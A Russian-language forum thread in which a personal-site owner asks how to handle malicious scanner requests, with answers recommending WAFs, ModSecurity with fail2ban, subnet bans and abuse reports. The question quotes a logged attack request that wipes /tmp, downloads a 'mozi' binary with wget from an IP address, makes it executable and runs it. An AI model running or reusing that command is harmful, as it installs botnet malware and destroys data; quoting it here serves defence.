Что делать с хакерскими http запросами?

Question

[ramiil]

У меня есть небольшой сайт, и на него последнее время начали приходить различные http-запросы не относящиеся к содержимому сайта, например

get wp-login.php
get /gponform/diag_form?images/
get /shell?cd+/tmp;rm+-rf+*;wget+192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi...

Очевидно, это злоумышленники и их боты, сканящие сайт в поисках уязвимостей. Вопрос - что с ними делать? Я написал скрипт, который банит их в iptables, может есть сайты, которые держат бан-листы или сигнатуры\регекспы для обнаружения злоумышленных запросов?

Answer 1

[Александр]

Забить, всех не перебанишь, а если захочешь - забанишь реальных пользаков.
Ну и просто не оставлять подобных уязвимостей.

Comments

[ramiil]

Уязвимостей(по крайней мере из стандартного набора скрипт-киддисов) вроде нет - сайт лично мой и самописный, по этой же причине реальных пользователей забанить трудно - их мало. Вопрос "что делать с хакерами" скорее из научного интереса, нежели из практического, по этому и написал - есть ли ресурсы, которые публикуют сигнатуры злонамеренных запросов итд.

[justhostRU]

>забанишь реальных пользаков.
реальные пользаки с мутных ип не долбятся ;-)

Answer 2

[Mnemonic0]

WAF - это вам поможет. Баны по ип/регионам это как блокировка /8 сетей при пыпытке заблокировать Телеграм.
Вкратце - прикрываешься CDN (Клаудфронт например) и в нём настраиваешь проверку AWS WAF - 95% всех попыток взлома будет закрыто.
Остальные 5% будет сильно дороже закрыть, всё зависит от денег, которые потеряются от простяо сайта.

Comments

[ramiil]

Т.к. сайт - личная страничка, то сторонний waf тут будет избыточен, а вот интерес поработать руками, головой и питоном есть. Если вам известны ресурсы, публикующие сигнатуры хакерских запросов - прошу поделиться.

[Mnemonic0]

ramiil, Не задавался такой целью, врядли такое есть, а если и есть то в сильно порезанном виде. По мне - дешевле купить WAF, чем тратить свои человеко-часы на это.

[Александр Фалалеев]

ramiil, прикрутить бесплатный modsecurity к apache или nginx, а затем в fail2ban добавить соответствующий action.

Answer 3

[Довольный Айтишникъ]

Определиться с целевой аудиторией, если это РФ, то доступ из других стран нам не нужен и мы можем смело забанить подсети Америки и т.п..
Как минимум забанить подсети Китая, оттуда постоянно самые неадекватные запросы идут.
Так же можно в бан листы отправить известные выходные ноды тора
Отправить в бан лист сервера Amazon и им подобные.

Объем всякого мусора сократится в разы, главное не забанить нужное)))

Answer 4

[Ищю в поисковиках]

1. Проверить, что уязвимости закрыты.
2. Отрепортить владельцу ip о том, что из его сети идёт атака (возможно, хост взломан). Посмотреть владельца ip можно во whois по ip (abuse contact).
3. Забанить ip на неделю.

Это поможет:
1. Не быть взломанным.
2. Принести убытки атакующим: сократить объем атакующих хостов.

Это не поможет:
1. Если взломали самого провайдера (актуально для африканских стран)
2. Если в системе уже сидит дорвей.